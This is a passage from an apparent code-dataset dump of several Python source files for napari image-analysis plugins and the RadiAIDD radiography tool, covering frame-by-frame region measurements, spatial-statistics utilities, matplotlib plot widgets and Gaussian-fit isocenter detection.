return dict[id]
def to_dask(self):
graph = {}
name_dict = {}
for layer, (dw, mgui) in self._layers.items():
key = None
if isinstance(layer.metadata, dict):
key = layer.metadata.get(OP_ID)
if key is None:
key = "some_random_key"
args = []
inputs = []
for w in mgui:
if w.name in (VIEWER_PARAM, OP_NAME_PARAM):
continue
if "napari.layers" in type(w.value).__module__:
op_id = None
if isinstance(w.value.metadata, dict):
op_id = w.value.metadata.get(OP_ID)
if op_id is None:
op_id = "some_random_key"
source = str(w.value.source.path).replace("\\", "/") if w.value.source is not None else "file"
graph[self._id_to_name(op_id, name_dict)] = (cle.imread, ["'" + source + "'"], [], False, layer.contrast_limits[0], layer.contrast_limits[1]) # TODO
inputs.append(self._id_to_name(op_id, name_dict))
else:
args.append(w.value)
from .._categories import find_function
op = find_function(getattr(mgui, OP_NAME_PARAM).value)
#getattr(cle, getattr(mgui, OP_NAME_PARAM).value)
# shorten args by eliminating not-used ones
if op:
nargs = num_positional_args(op) - 1 - len(inputs)
args = args[:nargs]
is_labels = isinstance(layer, napari.layers.Labels)
graph[self._id_to_name(key, name_dict)] = (op, inputs, args, is_labels, layer.contrast_limits[0], layer.contrast_limits[1])
return graph
def to_jython(self, filename=None):
if not filename:
filename, _ = QFileDialog.getSaveFileName(self, "Save code as...", ".", "*.py")
return Pipeline.from_assistant(self).to_jython(filename)
def to_notebook(self, filename=None):
if not filename:
filename, _ = QFileDialog.getSaveFileName(self, "Save code as notebook...", ".", "*.ipynb")
return Pipeline.from_assistant(self).to_notebook(filename)
def to_clipboard(self):
import pyperclip
pyperclip.copy(Pipeline.from_assistant(self).to_jython())
def to_script_editor(self):
import napari_script_editor
editor = napari_script_editor.ScriptEditor.get_script_editor_from_viewer(self._viewer)
editor.set_code(Pipeline.from_assistant(self).to_napari_python())
``` |
{
"source": "jo-mueller/napari-skimage-regionprops",
"score": 2
} |
#### File: napari-skimage-regionprops/napari_skimage_regionprops/_all_frames.py
```python
import napari
from toolz import curry
from typing import Callable
from functools import wraps
import inspect
import numpy as np
import pandas as pd
from ._utilities import isimage
@curry
def analyze_all_frames(function: Callable) -> Callable:
from napari_workflows._workflow import _get_layer_from_data
@wraps(function)
def worker_function(*args, **kwargs):
args = list(args)
sig = inspect.signature(function)
# create mapping from position and keyword arguments to parameters
# will raise a TypeError if the provided arguments do not match the signature
# https://docs.python.org/3/library/inspect.html#inspect.Signature.bind
bound = sig.bind(*args, **kwargs)
# set default values for missing arguments
# https://docs.python.org/3/library/inspect.html#inspect.BoundArguments.apply_defaults
bound.apply_defaults()
# Retrieve the viewer parameter so that we can know which current timepoint is selected
viewer = None
for key, value in bound.arguments.items():
if isinstance(value, napari.Viewer):
viewer = value
viewer_key = key
labels_layer = None
image_layer = None
original_args = copy_dict(bound.arguments)
if viewer is not None:
variable_timepoint = list(viewer.dims.current_step)
current_timepoint = variable_timepoint[0]
max_time = int(viewer.dims.range[-4][1])
# find a labels layer to attach result
for key, value in original_args.items():
if isimage(value):
layer = _get_layer_from_data(viewer, value)
if isinstance(layer, napari.layers.Labels):
labels_layer = layer
labels_layer_key = key
if isinstance(layer, napari.layers.Image):
image_layer = layer
image_layer_key = key
else:
max_time = 0
for key, value in original_args.items():
if isimage(value):
if len(value.shape) == 4 and max_time < value.shape[0]:
max_time = value.shape[0]
original_args = copy_dict(bound.arguments)
result = None
for f in range(max_time):
print("analyzing frame", f)
args = copy_dict(original_args)
if viewer is None:
for key, value in args.items():
if isimage(value):
if len(value.shape) == 4:
new_value = value[f]
if new_value.shape[0] == 1:
new_value = new_value[0]
args[key] = new_value
elif len(value.shape) == 3:
# keep a 3D label image for example
pass
else:
raise NotImplementedError("Analyzing all frames only supports combination of 3D and 4D-data")
else:
# in case of 4D-data (timelapse) crop out the current 3D timepoint
if len(viewer.dims.current_step) != 4:
raise NotImplementedError("Analyzing all frames only supports 4D-data")
variable_timepoint[0] = f
viewer.dims.current_step = variable_timepoint
_refresh_viewer(viewer)
from napari_workflows._workflow import _break_down_4d_to_2d_kwargs
args[labels_layer_key] = labels_layer.data
args[image_layer_key] = image_layer.data
_break_down_4d_to_2d_kwargs(args, f, viewer)
args[viewer_key] = None
bound.arguments = args
# call the decorated function
result_single_frame = function(*bound.args, **bound.kwargs)
result_single_frame['frame'] = [f] * len(result_single_frame['label'])
if result is None:
result = pd.DataFrame(result_single_frame)
else:
result = pd.concat([result, pd.DataFrame(result_single_frame)], ignore_index=True)
if viewer is not None:
# reset viewer
variable_timepoint[0] = current_timepoint
viewer.dims.current_step = variable_timepoint
_refresh_viewer(viewer)
if labels_layer is not None:
labels_layer.properties = result.to_dict(orient='list')
from ._table import add_table
add_table(labels_layer, viewer)
else:
return result.to_dict()
return worker_function
def copy_dict(source, result=None):
if result is None:
result = {}
for k, v in source.items():
result[k] = v
return result
def _refresh_viewer(viewer):
if viewer is None:
return
from napari_workflows import WorkflowManager
wm = WorkflowManager.install(viewer)
w = wm.workflow
while(wm._search_first_invalid_layer (w.roots()) is not None):
wm._update_invalid_layer()
```
#### File: napari-skimage-regionprops/napari_skimage_regionprops/_parametric_images.py
```python
from napari_tools_menu import register_function
import numpy
@register_function(menu="Visualization > Measurements on labels (nsr)")
def visualize_measurement_on_labels(labels_layer:"napari.layers.Labels", column:str = "label") -> "napari.types.ImageData":
labels = labels_layer.data
table = labels_layer.properties
measurements = table[column]
if isinstance(measurements, numpy.ndarray):
measurements = measurements.tolist()
try:
import pyclesperanto_prototype as cle; return cle.pull(cle.replace_intensities(labels, numpy.asarray([0] + measurements)))
except ImportError:
return relabel_numpy(labels, measurements)
def relabel_numpy(image, measurements):
return numpy.take(numpy.array([0] + measurements), image)
``` |
{
"source": "jo-mueller/napari-spatial-statistics",
"score": 2
} |
#### File: napari_spatial_statistics/_tests/test_utils.py
```python
import numpy as np
def test_utils():
from napari_spatial_statistics._utils import adjacency_matrix_to_list_of_neighbors, \
list_of_neighbors_to_adjacency_matrix
adj_matrix = np.array([[1, 1, 0],
[1, 1, 1],
[0, 1, 1]])
lst = adjacency_matrix_to_list_of_neighbors(adj_matrix)
_adj_matrix = list_of_neighbors_to_adjacency_matrix(lst)
assert np.array_equal(adj_matrix, _adj_matrix)
def test_utils2(make_napari_viewer):
from napari_spatial_statistics._sample_data import make_random_points
from napari_spatial_statistics._utils import get_features, add_features
viewer = make_napari_viewer()
n_points = 1000
pts = make_random_points(n_classes=3, n_points=n_points)
pts = viewer.add_points(pts[0], **pts[1])
n_points = pts.data.shape[0]
props = get_features(pts)
assert 'Cell type' in list(props.keys())
new_feature = ['test'] * n_points
add_features(pts, 'new_cool_feature', new_feature)
props = get_features(pts)
assert 'new_cool_feature' in list(props.keys())
if __name__ == "__main__":
import napari
test_utils2(napari.Viewer)
```
#### File: src/napari_spatial_statistics/_utils.py
```python
import numpy as np
from napari_skimage_regionprops._table import add_table, TableWidget
from napari.layers import Points, Layer
from typing import TYPE_CHECKING
if TYPE_CHECKING:
import napari.viewer
def adjacency_matrix_to_list_of_neighbors(adj_matrix: np.ndarray):
assert adj_matrix.shape[0] == adj_matrix.shape[1]
list_of_neighbors = []
for k in range(adj_matrix.shape[0]):
list_of_neighbors.append(list(np.argwhere(adj_matrix[k] != 0).flatten()))
return list_of_neighbors
def list_of_neighbors_to_adjacency_matrix(list_of_neighbors: list):
adj_matrix = np.zeros([len(list_of_neighbors)] * 2, dtype=int)
for k, entry in enumerate(list_of_neighbors):
adj_matrix[k][np.array(entry)] = 1
return adj_matrix
def set_features(layer, tabular_data):
if hasattr(layer, "properties"):
layer.properties = tabular_data
if hasattr(layer, "features"):
layer.features = tabular_data
def add_features(layer, key, data):
if hasattr(layer, 'properties'):
layer.properties[key] = data
if hasattr(layer, 'features'):
layer.features[key] = data
def get_features(layer, key=None):
if hasattr(layer, 'properties'):
if key is None:
return layer.properties
else:
return layer.properties[key]
if hasattr(layer, 'features'):
if key is None:
return layer.features
else:
return layer.features[key]
def properties_to_table(viewer: 'napari.viewer.Viewer',
points: Points):
"""Put properties of a points layer into a table widget."""
# Convert to napari points layer
if isinstance(points, tuple):
points = Points(points[0], **points[1])
tablewidget = add_table(points, viewer)
tablewidget._view.clicked.connect(lambda: highlight_neighbors(viewer,
points,
tablewidget))
def highlight_neighbors(viewer: 'napari.viewer.Viewer',
layer: Layer,
table_widget: TableWidget):
"""Highlight neighbors of a selected point in a table widget."""
row = int(table_widget._view.currentRow())
neighbors = table_widget._table["neighbors"][row]
neighbors = np.array([int(x) for x in neighbors.split(',')]) # convert to indices
edgecolors = np.zeros((layer.data.shape[0], 4), dtype=float)
edgewidth = np.zeros(layer.data.shape[0])
edgecolors[:, -1] = 1 # set alpha to 1
edgecolors[neighbors] = [0.75, 0.75, 0.75, 1]
edgecolors[row] = [1, 1, 1, 1]
edgewidth[neighbors] = 0.75
edgewidth[row] = 0.75
layer.edge_color = edgecolors
layer.edge_width = edgewidth
from qtpy.QtWidgets import QWidget,\
QVBoxLayout,\
QSizePolicy,\
QPushButton,\
QHBoxLayout,\
QFileDialog
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.figure import Figure
import matplotlib as mpl
COLOR='white'
mpl.rcParams['text.color'] = COLOR
mpl.rcParams['axes.labelcolor'] = COLOR
mpl.rcParams['xtick.color'] = COLOR
mpl.rcParams['ytick.color'] = COLOR
from napari_tools_menu import register_dock_widget
import numpy as np
class MplCanvas(FigureCanvas):
"""
Defines the canvas of the matplotlib window
From https://github.com/haesleinhuepf/napari-workflow-inspector/blob/main/src/napari_workflow_inspector/_dock_widget.py
"""
def __init__(self):
self.fig = Figure() # create figure
self.axes = self.fig.add_subplot(111) # create subplot
self.axes.spines['bottom'].set_color('white')
self.axes.spines['top'].set_color('white')
self.axes.spines['left'].set_color('white')
self.axes.spines['right'].set_color('white')
self.fig.patch.set_facecolor('#262930')
self.axes.set_facecolor('#262930')
self.axes.grid(which='major', linestyle='--', color='white', alpha=0.6)
self.axes.tick_params(axis='both', colors='white')
FigureCanvas.__init__(self, self.fig) # initialize canvas
FigureCanvas.setSizePolicy(self, QSizePolicy.Expanding,
QSizePolicy.Expanding)
FigureCanvas.updateGeometry(self)
class matplotlibWidget(QWidget):
"""
The matplotlibWidget class based on QWidget
"""
def __init__(self, parent=None):
QWidget.__init__(self, parent)
# save canvas and toolbar
self.canvas = MplCanvas()
self.toolbar = NavigationToolbar(self.canvas, self)
# set layout and add them to widget
self.vbl = QVBoxLayout()
self.vbl.addWidget(self.toolbar)
self.vbl.addWidget(self.canvas)
self.setLayout(self.vbl)
@register_dock_widget(menu="Visualization > Spatial statistics plot widget")
class PlotWidget(QWidget):
def __init__(self, napari_viewer):
super().__init__()
self._viewer = napari_viewer
self.plotwidget = matplotlibWidget()
self.setLayout(QVBoxLayout())
self.layout().addWidget(self.plotwidget)
self.ExportCSVButton = QPushButton('Export to csv')
self.ExportPNGButton = QPushButton('Save as png')
# widget for data export
data_export_container = QWidget()
data_export_container.setLayout(QHBoxLayout())
data_export_container.layout().addWidget(self.ExportCSVButton)
data_export_container.layout().addWidget(self.ExportPNGButton)
self.layout().addWidget(data_export_container)
self.df = None
# connect buttons
self.ExportPNGButton.clicked.connect(self.export_png)
self.ExportCSVButton.clicked.connect(self.export_csv)
def plot_from_dataframe(self, df, xkey = None, ykey = None, **kwargs):
self.df = df
self.plotwidget.canvas.axes.clear()
if xkey is None:
x = np.arange(0, len(df), 1)
else:
x = df[xkey].to_numpy()
if ykey is None:
ykey = df.columns.to_list()
ykey.remove(xkey)
y = df[ykey].to_numpy()
else:
y = df[ykey].to_numpy()
for iy in range(len(ykey)):
self.plotwidget.canvas.axes.plot(x, y[:, iy], label = ykey[iy])
self.plotwidget.canvas.axes.set(**kwargs)
self._postprocess()
self.plotwidget.canvas.draw()
def export_png(self):
filename, _ = QFileDialog.getSaveFileName(caption='Save figure to file',
filter='*.png')
if not filename.endswith('.csv'):
filename += '.png'
self.plotwidget.canvas.axes.figure.savefig(filename, dpi=150)
def export_csv(self):
filename, _ = QFileDialog.getSaveFileName(caption='Save data to file',
filter='*.csv')
if not filename.endswith('.csv'):
filename += '.csv'
self.df.to_csv(filename)
def _postprocess(self):
self.plotwidget.canvas.axes.legend()
self.plotwidget.canvas.axes.xaxis.label.set_color('white')
self.plotwidget.canvas.axes.yaxis.label.set_color('white')
self.plotwidget.canvas.axes.grid(which='major', linestyle='--',
color='white', alpha=0.7)
``` |
{
"source": "jo-mueller/RadiAiDD",
"score": 2
} |
#### File: RadiAIDD/Backend/Children.py
```python
import matplotlib.patches as patches
from matplotlib.widgets import RectangleSelector
import numpy as np
import traceback
import logging
import tifffile
import pydicom as dcm
import scipy.optimize as opt
import matplotlib
from RadiAIDD.Backend.Containers import RadiographyImage
from RadiAIDD.Backend.UI import IsoCenter5 as IsoCenter
# import Backend.UI.Landmark5 as Landmark
from PyQt5 import QtGui
from PyQt5.QtWidgets import QMessageBox as QMessage
from PyQt5.QtWidgets import QFileDialog as Qfile
from PyQt5.QtWidgets import QMainWindow as QMain
from PyQt5.QtWidgets import QToolBar
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import Qt
import PyQt5.QtCore as QtCore
from PyQt5.QtWidgets import QInputDialog
''''''''''''''''''''''''
"""ISOCENTER -Dialogue"""
''''''''''''''''''''''''
class IsoCenter_Child(QMain, IsoCenter.Ui_IsoCenter):
"Class that contains subroutines to define isocenter from Lynx image"
def __init__(self, parent, owner):
super(IsoCenter_Child, self).__init__()
self.Owner = owner
self.setupUi(self)
self.setStyleSheet(parent.styleSheet())
self.parent = parent
self.canvas = self.Display_IsoCenter.canvas
self.toolbar = self.canvas.toolbar
# Connect buttons
self.Button_LoadSpot.clicked.connect(self.load)
self.Button_detectIsoCenter.clicked.connect(self.drawRect)
self.Button_SetIsoCenter.clicked.connect(self.LockIsoCenter)
self.Button_Done.clicked.connect(self.Done)
# Works only after first rectangle was drawn
try:
self.Button_detectIsoCenter.clicked.connect(self.initclick)
except AttributeError:
pass
# Flags and Containers
self.Image = None
self.press = None
self.rects = []
self.target_markers = []
# Flags
self.IsoCenter_flag = False
# Lists for isocenter markers in canvas
self.target_markers = []
def drawRect(self):
# Remove previous spotdetections
for item in self.target_markers:
if type(item) == matplotlib.contour.QuadContourSet:
[artist.set_visible(False) for artist in item.collections]
else:
item.set_visible(False)
# change cursor style
QApplication.setOverrideCursor(Qt.CrossCursor)
# Rectangle selector for 2d fit
rectprops = dict(facecolor='orange', edgecolor=None,
alpha=0.2, fill=True)
# drawtype is 'box' or 'line' or 'none'
self.RS = RectangleSelector(self.canvas.axes,
self.line_select_callback,
drawtype='box', rectprops=rectprops,
button=[1], # don't use middle button
minspanx=5, minspany=5,
spancoords='pixels', useblit=True,
interactive=True)
self.canvas.draw()
self.bg = self.canvas.copy_from_bbox(self.RS.ax.bbox)
self.RS.set_visible(True)
ext = (0, 4, 0, 1)
self.RS.draw_shape(ext)
# Update displayed handles
self.RS._corner_handles.set_data(*self.RS.corners)
self.RS._edge_handles.set_data(*self.RS.edge_centers)
self.RS._center_handle.set_data(*self.RS.center)
for artist in self.RS.artists:
self.RS.ax.draw_artist(artist)
artist.set_animated(False)
self.canvas.draw()
self.cid = self.canvas.mpl_connect("button_press_event",
self.initclick)
def line_select_callback(self, eclick, erelease):
x1, y1 = eclick.xdata, eclick.ydata
x2, y2 = erelease.xdata, erelease.ydata
p1 = (x1, y1)
p2 = (x2, y2)
self.spotDetect(p1, p2)
def initclick(self, evt):
self.RS.background = self.bg
self.RS.update()
for artist in self.RS.artists:
artist.set_animated(True)
self.canvas.mpl_disconnect(self.cid)
def load(self):
"load radiography image of beam IsoCenter"
# get filename from full path and display
fname = Qfile.getOpenFileName(self, 'Open file', "",
"Dicom files (*.dcm *tiff *tif)")[0]
try:
# import imagedata with regard to filetype
if fname.endswith("dcm"):
meta = dcm.read_file(fname)
self.Image = RadiographyImage(fname, meta.pixel_array,
meta.PixelSpacing)
elif fname.endswith("tif") or fname.endswith("tiff"):
pw, okx = QInputDialog.getDouble(self,
'Pixel Spacing',
'pixel width (mm):',
0.05, decimals=2)
self.Image = RadiographyImage(fname, tifffile.imread(fname),
pw)
self.Text_Filename.setText(fname) # display filename
self.canvas.axes.imshow(self.Image.array, cmap='gray',
zorder=1, origin='lower')
self.canvas.draw()
logging.info('{:s} imported as Isocenter'.format(fname))
except Exception:
logging.ERROR("{:s} could not be opened".format(fname))
self.IsoCenter_flag = False
return 0
def LockIsoCenter(self):
""" Read current values from sliders/ spot location text fields
and set as final isocenter coordinates to be used for the
actual positioning"""
self.SpotTxt_x.setStyleSheet("color: rgb(255, 0, 0);")
self.SpotTxt_y.setStyleSheet("color: rgb(255, 0, 0);")
# Raise flag for checksum check later
self.IsoCenter_flag = True
# Function to pass IsoCenter values to parent window
self.Owner.return_isocenter(self.Image,
[self.SpotTxt_x.value(),
self.SpotTxt_y.value()])
logging.info('Isocenter coordinates confirmed')
def update_crosshair(self):
"""Get value from Spinboxes and update all
markers/plots if that value is changed"""
x = self.SpotTxt_x.value()
y = self.SpotTxt_y.value()
# Update Plot Markers
self.hline.set_ydata(y)
self.vline.set_xdata(x)
# Update Plot
self.Display_IsoCenter.canvas.draw()
self.SpotTxt_x.setStyleSheet("color: rgb(0, 0, 0);")
self.SpotTxt_y.setStyleSheet("color: rgb(0, 0, 0);")
self.IsoCenter_flag = False
def spotDetect(self, p1, p2):
" Function that is invoked by ROI selection, autodetects earpin"
# Restore old cursor
QApplication.restoreOverrideCursor()
# Get ROI limits from drawn rectangle corners
x = int(min(p1[0], p2[0]) + 0.5)
y = int(min(p1[1], p2[1]) + 0.5)
width = int(np.abs(p1[0] - p2[0]) + 0.5)
height = int(np.abs(p1[1] - p2[1]) + 0.5)
subset = self.Image.array[y: y + height, x: x + width]
# Calculate fit function values
try:
popt, pcov = find_center(subset, x, y, sigma=5.0)
logging.info('Detected coordinates for isocenter:'
'x = {:2.1f}, y = {:2.1f}'.format(popt[1], popt[2]))
except Exception:
logging.error('Autodetection of Landmark in ROI failed.')
# self.TxtEarpinX.setValue(0)
# self.TxtEarpinY.setValue(0)
return 0
xx, yy, xrange, yrange = array2mesh(self.Image.array)
data_fitted = twoD_Gaussian((xx, yy), *popt)
# Print markers into image
ax = self.canvas.axes
self.target_markers.append(ax.contour(xx, yy, data_fitted.reshape(
yrange, xrange), 5))
self.target_markers.append(ax.axvline(popt[1], 0, ax.get_ylim()[1]))
self.target_markers.append(ax.axhline(popt[2], 0, ax.get_xlim()[1]))
self.canvas.draw()
self.SpotTxt_x.setValue(popt[1])
self.SpotTxt_y.setValue(popt[2])
logging.info('Coordinates of IsoCenter set to '
'x = {:.1f}, y = {:.1f}'.format(popt[1], popt[2]))
def Done(self):
"Ends IsoCenter Definition and closes Child"
# Also check whether all values were locked to main window
if not self.IsoCenter_flag:
Hint = QMessage()
Hint.setStandardButtons(QMessage.No | QMessage.Yes)
Hint.setIcon(QMessage.Information)
Hint.setText("Some values have not been locked or were modified!"
"\nProceed?")
answer = Hint.exec_()
if answer == QMessage.Yes:
self.close()
else:
self.close()
# ''''''''''''''''''''''''
# """Landmark -Dialogue"""
# ''''''''''''''''''''''''
# class Landmark_Child(QMain, Landmark.Ui_Landmark):
# "Class that contains subroutines to define isocenter from Lynx image"
# def __init__(self, parent, Owner):
# super(Landmark_Child, self).__init__()
# self.setupUi(self)
# self.parent = parent # GUI instance
# self.Owner = Owner
# self.setStyleSheet(parent.styleSheet())
# # Data container
# self.Image = None
# # Set up plots
# self.canvas = self.Display_Landmarks.canvas
# # Connect Buttons and fields
# self.d_SourceDetector.valueChanged.connect(self.calcspacing)
# self.d_ObjectDetector.valueChanged.connect(self.calcspacing)
# # Set defaults
# self.d_SourceDetector.setValue(200.0)
# self.d_ObjectDetector.setValue(9.0)
# # Set up different segmentation procedures
# # define ROI for earpin autodetection
# self.Button_defineROI.clicked.connect(self.drawRect)
# # Buttons about earpin definition
# # Load Radiography image
# self.Button_LoadLandmark.clicked.connect(self.load)
# # set bed values and disconnect all sliders
# self.Button_accptPxSpace.clicked.connect(self.accept_spacing)
# # pass values about landmarks to parent
# self.Button_lockEarpin.clicked.connect(self.Lock_Landmarks)
# # Finish
# self.Button_Done.clicked.connect(self.Done)
# # Flags and Containers
# self.press = None
# self.rects = []
# self.target_markers = []
# self.Landmark_flag = False
# self.Spacing_flag = False
# def drawRect(self):
# # Remove previous spotdetections
# for item in self.target_markers:
# if type(item) == matplotlib.contour.QuadContourSet:
# [artist.set_visible(False) for artist in item.collections]
# else:
# item.set_visible(False)
# # change cursor style
# QApplication.setOverrideCursor(Qt.CrossCursor)
# # Rectangle selector for 2d fit
# rectprops = dict(facecolor='orange', edgecolor=None,
# alpha=0.2, fill=True)
# # drawtype is 'box' or 'line' or 'none'
# self.RS = RectangleSelector(self.canvas.axes,
# self.line_select_callback,
# drawtype='box', rectprops=rectprops,
# button=[1], # don't use middle button
# minspanx=5, minspany=5,
# spancoords='pixels', useblit=True,
# interactive=True)
# self.canvas.draw()
# self.bg = self.canvas.copy_from_bbox(self.RS.ax.bbox)
# self.RS.set_visible(True)
# ext = (0, 4, 0, 1)
# self.RS.draw_shape(ext)
# # Update displayed handles
# self.RS._corner_handles.set_data(*self.RS.corners)
# self.RS._edge_handles.set_data(*self.RS.edge_centers)
# self.RS._center_handle.set_data(*self.RS.center)
# for artist in self.RS.artists:
# self.RS.ax.draw_artist(artist)
# artist.set_animated(False)
# self.canvas.draw()
# self.cid = self.canvas.mpl_connect("button_press_event",
# self.initclick)
# def line_select_callback(self, eclick, erelease):
# x1, y1 = eclick.xdata, eclick.ydata
# x2, y2 = erelease.xdata, erelease.ydata
# p1 = (x1, y1)
# p2 = (x2, y2)
# self.pinDetect(p1, p2)
# def initclick(self, evt):
# self.RS.background = self.bg
# self.RS.update()
# for artist in self.RS.artists:
# artist.set_animated(True)
# self.canvas.mpl_disconnect(self.cid)
# def load(self):
# "load radiography image of object radiography"
# # get filename from full path and display
# fname = Qfile.getOpenFileName(self, 'Open file', "",
# "Dicom files (*.dcm *tiff *tif)")[0]
# try:
# # import imagedata with regard to filetype
# if fname.endswith("dcm"):
# meta = dcm.read_file(fname)
# self.Image = RadiographyImage(fname, meta.pixel_array,
# meta.PixelSpacing)
# elif fname.endswith("tif") or fname.endswith("tiff"):
# pw, okx = QInputDialog.getDouble(self,
# 'Pixel Spacing',
# 'pixel width (mm):',
# 0.05, decimals=2)
# self.Image = RadiographyImage(fname, tifffile.imread(fname),
# [pw, pw])
# self.Text_Filename.setText(fname) # display filename
# except:
# logging.ERROR("{:s} could not be opened".format(fname))
# self.IsoCenter_flag = False
# return 0
# self.canvas.axes.imshow(self.Image.array, cmap='gray',
# zorder=1, origin='lower')
# self.canvas.draw()
# self.calcspacing() # recalculate spacing with new image
# logging.info('{:s} imported as Isocenter Radiography'.format(fname))
# self.gettablecoords() # get motor coordinates for this image
# def gettablecoords(self):
# """Function that is called upon upload of radiography
# that prompts user to enter table coordinates"""
# x, okx = QInputDialog.getDouble(self, 'Table position: X', 'x_table:',
# 0.0, decimals=4)
# y, oky = QInputDialog.getDouble(self, 'Table position: Y', 'y_table:',
# 0.0, decimals=4)
# if not okx or not oky:
# self.parent.TableTxt_x.setText('X Value not set!!')
# self.parent.TableTxt_y.setText('Y Value not set!!')
# else:
# self.parent.TableTxt_x.setText('{:2.4f}'.format(x))
# self.parent.TableTxt_y.setText('{:2.4f}'.format(y))
# self.parent.TableTxt_x.setStyleSheet("color: #b1b1b1;")
# self.parent.TableTxt_y.setStyleSheet("color: #b1b1b1;")
# def calcspacing(self):
# """Calculate new pixel spacing based upon distances between
# Radiation source, object and detector"""
# try:
# dd = self.Image.pw[0] # pixel spacing of detector in mm
# d_OD = self.d_ObjectDetector.value()
# d_SD = self.d_SourceDetector.value()
# if d_OD != 0 and d_SD != 0:
# self.Spacing = dd*(1.0 - d_OD/d_SD) # Dreisatz
# self.LabelPixSpace.setText('Pixel Spacing: {:4.2f} mm'.format(
# self.Spacing))
# except AttributeError:
# pass
# def pinDetect(self, p1, p2):
# " Function that is invoked by ROI selection, autodetects earpin"
# # Restore old cursor
# QApplication.restoreOverrideCursor()
# # Get ROI limits from drawn rectangle corners
# x = int(min(p1[0], p2[0]) + 0.5)
# y = int(min(p1[1], p2[1]) + 0.5)
# width = int(np.abs(p1[0] - p2[0]) + 0.5)
# height = int(np.abs(p1[1] - p2[1]) + 0.5)
# # get data selection from inside the rectangle and invert
# subset = self.Image.array[y: y + height, x: x + width]
# subset = np.max(subset) - subset
# # Calculate fit function values
# try:
# popt, pcov = find_center(subset, x, y, sigma=5.0)
# logging.info('Detected coordinates for earpin: '
# 'x = {:2.1f}, y = {:2.1f}'.format(popt[1], popt[2]))
# except Exception:
# logging.error('ERROR: Autodetection of Landmark in ROI failed.')
# self.TxtEarpinX.setValue(0)
# self.TxtEarpinY.setValue(0)
# return 0
# xx, yy, xrange, yrange = array2mesh(self.Image.array)
# data_fitted = twoD_Gaussian((xx, yy), *popt)
# # Print markers into image
# ax = self.canvas.axes
# self.target_markers.append(
# ax.contour(xx, yy, data_fitted.reshape(yrange, xrange), 5))
# self.target_markers.append(ax.axvline(popt[1], 0, ax.get_ylim()[1]))
# self.target_markers.append(ax.axhline(popt[2], 0, ax.get_xlim()[1]))
# self.canvas.draw()
# self.TxtEarpinX.setValue(popt[1])
# self.TxtEarpinY.setValue(popt[2])
# logging.info('Coordinates of Radiography landmarks: '
# 'x = {:.1f}, y = {:.1f}'.format(popt[1], popt[2]))
# def accept_spacing(self):
# "Lock Spacing and disconnect sliders"
# self.d_SourceDetector.setStyleSheet("color: rgb(255, 0, 0);")
# self.d_ObjectDetector.setStyleSheet("color: rgb(255, 0, 0);")
# # Check if rectangle is still in plot
# for rect in self.rects:
# rect.remove()
# self.rects = []
# # Update Plot
# self.Display_Landmarks.canvas.draw()
# # Pass spacing to parent
# self.Owner.return_spacing(self.Spacing)
# # Raise Flag
# self.Spacing_flag = True
# # Log
# logging.info('Pixel spacing k = {:.2f} mm/px of'
# 'landmark radiography confirmed'.format(self.Spacing))
# def Lock_Landmarks(self):
# """Checks if image is X-Ray or Dicom and
# passes landmark coordinates to parent window"""
# # Paint it Red
# self.TxtEarpinX.setStyleSheet("color: rgb(255, 0, 0);")
# self.TxtEarpinY.setStyleSheet("color: rgb(255, 0, 0);")
# # Check and pass
# self.Owner.return_landmarks(self.Image,
# [self.TxtEarpinX.value(),
# self.TxtEarpinY.value()])
# # Raise Flag
# self.Landmark_flag = True
# # Log
# logging.info('Coordinates of Radiography landmarks confirmed')
# def Done(self):
# "Closses the window"
# # Check if all values have been set properly
# if False in [self.Spacing_flag, self.Landmark_flag]:
# Hint = QMessage()
# Hint.setStandardButtons( QMessage.No | QMessage.Yes)
# Hint.setIcon(QMessage.Information)
# Hint.setText("Some values have not been locked or were modified! \nProceed?")
# answer = Hint.exec_()
# if answer == QMessage.Yes: self.close()
# else:
# self.close()
def find_center(dataset, x_offset, y_offset, sigma):
""" Fit function to find IsoCenter without Sliders"""
xx, yy,_,_ = array2mesh(dataset)
# Even background of dataset
dataset = dataset - np.median(dataset)
dataset[dataset < 0] = 0
# Calculate values for initial guess
Offset = np.median(dataset)
Amplitude = np.max(dataset) - Offset
y0, x0 = np.unravel_index(dataset.argmax(), dataset.shape)
initial_guess = [Amplitude, x0, y0, sigma, sigma, 0, Offset]
# Run Fit
popt, pcov = opt.curve_fit(twoD_Gaussian, (xx, yy), dataset.ravel(), p0=initial_guess)
# Add offset to account for piece of vision effect
popt[1] += x_offset
popt[2] += y_offset
return popt, pcov
def twoD_Gaussian(xdata_tuple, amplitude, xo, yo, sigma_x, sigma_y, theta, offset):
(x, y) = xdata_tuple
xo = float(xo)
yo = float(yo)
a = (np.cos(theta)**2)/(2*sigma_x**2) + (np.sin(theta)**2)/(2*sigma_y**2)
b = -(np.sin(2*theta))/(4*sigma_x**2) + (np.sin(2*theta))/(4*sigma_y**2)
c = (np.sin(theta)**2)/(2*sigma_x**2) + (np.cos(theta)**2)/(2*sigma_y**2)
g = offset + amplitude*np.exp( - (a*((x-xo)**2) + 2*b*(x-xo)*(y-yo)
+ c*((y-yo)**2)))
return g.ravel()
def array2mesh(array):
"""takes an array and returns the according meshgrid"""
try:
yrange = np.shape(array)[0]
xrange = np.shape(array)[1]
# Set grid for evaluatin of fit
x = np.linspace(0, xrange-1, xrange)
y = np.linspace(0, yrange-1, yrange)
xx, yy = np.meshgrid(x, y)
except Exception:
logging.debug(traceback.print_exc())
return xx, yy, xrange, yrange
```
#### File: RadiAIDD/Backend/matplotlibwidgetFileSmall.py
```python
try:
from PyQt4 import QtGui
from PyQt4.QtGui import QApplication as Qapp
from PyQt4.QtGui import QFileDialog as Qfile
import PyQt4.QtCore as QtCore
from PyQt4.QtGui import QWidget as QWid
except:
from PyQt5 import QtGui
from PyQt5.QtWidgets import QApplication as Qapp
from PyQt5.QtWidgets import QFileDialog as Qfile
from PyQt5.QtWidgets import QWidget as QWid
import PyQt5.QtCore as QtCore
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.figure import Figure
class MplCanvas(FigureCanvas):
"""
Defines the canvas of the matplotlib window
"""
def __init__(self):
self.fig = Figure() # create figure
self.axes = self.fig.add_subplot(111) # create subplot
self.fig.subplots_adjust(left=0.13, bottom=0.08, right=0.96,
top=0.92, wspace=None, hspace=None)
FigureCanvas.__init__(self, self.fig) # initialize canvas
FigureCanvas.setSizePolicy(self, QtGui.QSizePolicy.Expanding,
